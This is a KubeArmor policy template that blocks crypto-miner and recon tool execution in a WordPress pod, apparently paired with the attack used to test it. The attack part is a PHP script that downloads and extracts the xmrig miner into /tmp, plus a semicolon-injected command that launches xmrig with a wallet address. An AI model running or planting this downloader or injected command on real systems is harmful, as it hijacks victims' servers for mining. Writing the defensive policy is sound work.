KubeArmor policy template for preventing crypto miners execution

prevent-crypto-miners.yaml

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: prevent-crypto-miners
spec:
  selector:
    matchLabels:
      app: wordpress
      
  action: Block
  process:
    matchDirectories:
    - dir: /tmp/
      recursive: true
    
    matchPaths:
    # do not allow execution of xmrig (xmrig.com)
    - execname: xmrig
    
    # prevent execution of Dero miner
    - execname: dero
    - execname: dero-miner-linux-amd64
    - execname: dero-wallet-cli-linux-amd64
    - execname: derod-linux-amd64

    # do not allow execution of masscan/zgrab2/nmap used for recon 
    - execname: zgrab2
    - execname: masscan
    - execname: nmap
    
    # do not allow package management tools execution
    - execname: apt
    - execname: apk
    
    # time sync is important for miners. typically ntpdate is used.
    - execname: ntpdate
  
  # Do not allow overwriting system binaries
  file:
    matchDirectories:
    - dir: /usr/local/bin/
      readOnly: true
      recursive: true
    - dir: /sbin/
      readOnly: true
      recursive: true
    - dir: /bin/
      readOnly: true
      recursive: true
    - dir: /usr/bin/
      readOnly: true
      recursive: true
    - dir: /var/local/bin/
      readOnly: true
      recursive: true
    - dir: /boot/
      readOnly: true
      recursive: true
    
  message: cryptominer detected and blocked
  severity: 10
  tags: 
    - cryptominer

https://gist.githubusercontent.com/achrefbensaad/98d1512a2860bc54e393d9a9c8d00abc/raw/4c64ce76a42899b3e3b6ca3a7b42d4dff842009f/xmrig-downloader.php

; nohup /tmp/xmrig-6.21.1/xmrig 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD

<?php
    // maximum execution time in seconds
    set_time_limit (24 * 60 * 60);

    // folder to save downloaded files to. must end with slash
    $destination_folder = '/tmp/';

    $url = "https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-static-x64.tar.gz";
    $newfname = $destination_folder . basename($url);

    $file = fopen ($url, "rb");
    if ($file) {
      $newf = fopen ($newfname, "wb");

      if ($newf)
      while(!feof($file)) {
        fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
      }
    }

    if ($file) {
      fclose($file);
    }

    if ($newf) {
      fclose($newf);
    }
    $ret = exec('tar xf ' . $newfname.' -C /tmp' , $output, $error);
    // Debug
    var_dump($ret);
    var_dump($output);
    var_dump($error);
    $ret = exec('whoami', $output, $error);
    // Debug
    echo "dddd";
    var_dump($ret);
    var_dump($output);
    var_dump($error);

?>